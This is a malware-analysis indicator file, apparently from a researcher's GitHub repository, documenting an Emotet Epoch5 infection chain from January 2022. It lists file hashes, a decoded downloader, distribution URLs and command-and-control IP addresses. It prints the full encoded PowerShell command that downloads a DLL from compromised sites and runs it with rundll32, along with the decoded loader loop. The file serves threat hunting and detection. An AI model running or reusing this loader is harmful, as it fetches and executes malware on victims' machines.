-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathe5_emotet_31.01.2022.txt
81 lines (68 loc) · 5.22 KB
/
e5_emotet_31.01.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
Emotet 2022
************************************************************************************************************
Epoch5 - .zip > .xls > .bat > .ps > .dll
.xls e14df4726787b5945eb94bb49efe6f14096a929d7f2b598a03cffe8ed73f48ee
.dll e88d1422221b680ca1c286ee1d72b6724906f51d72d86afdcfe96f162bf2a4f6
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3&start /B /WAIT powershell -enc JABHAGQAcgBoAGsANAA9ACIAaAB0AHQAcAA6AC8ALwB0AGEAcwB0AGUAZABvAG4AbABpAG4AZQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADEANABMAGcAMwBQADIARAB0ADMAcgBxAEIAbQBhAFkAWgBPAC8ALABoAHQAdABwADoALwAvAHMAdABvAHIAZQAuAGEAbgBpAGMAeQBiAGUAcgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADAASgBJAFcAdABwAEoAdAA2ADgAMQBtAFEALwAsAGgAdAB0AHAAOgAvAC8AagBlAGYAZgByAGUAeQBsAHUAYgBpAG4ALgBpAGcAYwBsAG8AdQB0AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBnAEoANQBvAEQAYgBpAC8ALABoAHQAdABwAHMAOgAvAC8AZAB1AGwAaQBjAGgAawBoAGEAbQBwAGgAYQAyADQALgBuAGUAdAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAFAAVABoAE8ALwAsAGgAdAB0AHAAOgAvAC8AZABlAHYALgBsAGUAYQByAG4AYwBhAHIAYQB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBaAEkAdwBXAFYAYwBOAGkARQBEADQASgBZAHEAbgBxAC8ALABoAHQAdABwADoALwAvAGsAYQByAGUAbgBzAGcAYQByAGQAZQBuAHQAaQBwAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB3ADkAaQAzAFAASQBWAEQATwBKAEQAZQBGADAAOQA1AFMAVAAvACwAaAB0AHQAcAA6AC8ALwBzAHQAYQBuAGMAZQB3AGgAZQBlAGwAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdQByADAAMwAxAEcATgBnAFQAdQBiAEIAUwBzAGwAcQBOAC8ALABoAHQAdABwADoALwAvAGwAYQBvAGgAYQBuAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGIAcgBQAHEASAAvACwAaAB0AHQAcAA6AC8ALwAxADMAOQAuADkAOQAuADgAOQAuADIAMQAxAC8AdwBwAC0AYQBkAG0AaQBuAC8AVgBNADEASABSAGIAMwBiADAATQBHAEcAZABwAC8ALABoAHQAdABwADoALwAvAG8AbgBlAHgAbwBuAGUALgBlAGwAZQBtAGUAbgB0AG8AcgAuAGMAbABvAHUAZAAvAGMAZAByAHgAaAByAHQALwA2ADMAMgBTAEYAaQBXAG0AVAAxAFkALwAsAGgAdAB0AHAAcwA6AC8ALwBsAGEAcwB0AHIAZQBnAGEAcgBpAHMAdABvAHIAYQBuAHQAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBrAFgARgBSAFYAdQAvACwAaAB0AHQAcAA6AC8ALwBzAGUAbABsAGkAbgAuAGEAcABwAC8AdwBwAC0AYQBkAG0AaQBuAC8AMABXADQAQQBjAFcAdgBGAGsASABrAFYALwAiAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACAAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJABHAGQAcgBoAGsANAApAHsAJABoAGIAcgBrAGUAMgA9ACIAdgBiAGsAdwBrACIAOwAkAEcAcwBSAEUAdwB0ADQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABoAGQARwBlADUANQByAHUAcgA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAegBoAGQAawBqAGUAdwBcACIAKwAkAGgAYgByAGsAZQAyACsAIgAuAGQAbABsACIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABzAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGgAZABHAGUANQA1AHIAdQByADsAaQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGgAZABHAGUANQA1AHIAdQByACkAewAgAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAJABoAGQARwBlADUANQByAHUAcgApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAIgArACIAbgBkAG8AdwBzAFwAcwB5AHMAdwBvACIAKwAiAHcANgA0AFwAcgB1AG4AZABsACIAKwAiAGwAMwAyAC4AZQB4AGUAIgA7ACQAYgBuAFoAUgA2ADUAZAA9ACQAaABkAEcAZQA1ADUAcgB1AHIAKwAiACwAZgAiACsAJABHAHMAUgBFAHcAdAA0ADsAYgByAGUAYQBrADsAfQB9AH0A&c:\programdata\vkwer.bat
rundll32.exe "c:\programdata\zhdkjew\vbkwk.dll",DllRegisterServer
$gdrhk4 = "hxxp://tastedonline.com/cgi-bin/14Lg3P2Dt3rqBmaYZO/", "hxxp://store.anicyber.com/wp-content/0JIWtpJt681mQ/", "hxxp://jeffreylubin.igclout.com/wp-admin/gJ5oDbi/", "hxxps://dulichkhampha24.net/wp-content/rPThO/", "hxxp://dev.learncaraudio.com/wp-admin/ZIwWVcNiED4JYqnq/", "hxxp://karensgardentips.com/cgi-bin/w9i3PIVDOJDeF095ST/", "hxxp://stancewheels.com/wp-admin/ur031GNgTubBSslqN/", "hxxp://laohange.com/wp-content/brPqH/", "hxxp://139.99.89.211/wp-admin/VM1HRb3b0MGGdp/", "hxxp://onexone.elementor.cloud/cdrxhrt/632SFiWmT1Y/", "hxxps://lastregaristorante.com/wp-admin/vkXFRVu/", "hxxp://sellin.app/wp-admin/0W4AcWvFkHkV/"
foreach ($st in $gdrhk4) {
$hbrke2 = "vbkwk"
$gsrewt4 = get-random
$hdge55rur = "c:\\programdata\\zhdkjew\\" + $hbrke2 + ".dll"
invoke-webrequest -uri $st -outfile $hdge55rur
if (test-path $hdge55rur) {
if ((get-item $hdge55rur).length -ge 50000) {
$ghddfjhk5f = "c:\\windows\\syswow64\\rundll32.exe"
$bnzr65d = $hdge55rur + ",f" + $gsrewt4
break
}
}
}
.dll distro
hxxp://tastedonline.com/cgi-bin/14Lg3P2Dt3rqBmaYZO/
hxxp://store.anicyber.com/wp-content/0JIWtpJt681mQ/
hxxp://jeffreylubin.igclout.com/wp-admin/gJ5oDbi/
hxxps://dulichkhampha24.net/wp-content/rPThO/
hxxp://dev.learncaraudio.com/wp-admin/ZIwWVcNiED4JYqnq/
hxxp://karensgardentips.com/cgi-bin/w9i3PIVDOJDeF095ST/
hxxp://stancewheels.com/wp-admin/ur031GNgTubBSslqN/
hxxp://laohange.com/wp-content/brPqH/
hxxp://139.99.89.211/wp-admin/VM1HRb3b0MGGdp/
hxxp://onexone.elementor.cloud/cdrxhrt/632SFiWmT1Y/
hxxps://lastregaristorante.com/wp-admin/vkXFRVu/
hxxp://sellin.app/wp-admin/0W4AcWvFkHkV/
c2's
74.207.230.120:8080
139.196.72.155:8080
37.44.244.177:8080
37.59.209.141:8080
116.124.128.206:8080
217.182.143.207:443
54.37.228.122:443
203.153.216.46:443
168.197.250.14:80
207.148.81.119:8080
195.154.146.35:443
78.46.73.125:443
191.252.103.16:80
210.57.209.142:8080
185.168.130.138:443
142.4.219.173:8080
118.98.72.86:443
78.47.204.80:443
159.69.237.188:443
190.90.233.66:443
104.131.62.48:8080
62.171.178.147:8080
185.148.168.15:8080
54.38.242.185:443
198.199.98.78:8080
194.9.172.107:8080
85.214.67.203:8080
66.42.57.149:443
185.148.168.220:8080
103.41.204.169:8080
128.199.192.135:8080
195.77.239.39:8080
59.148.253.194:443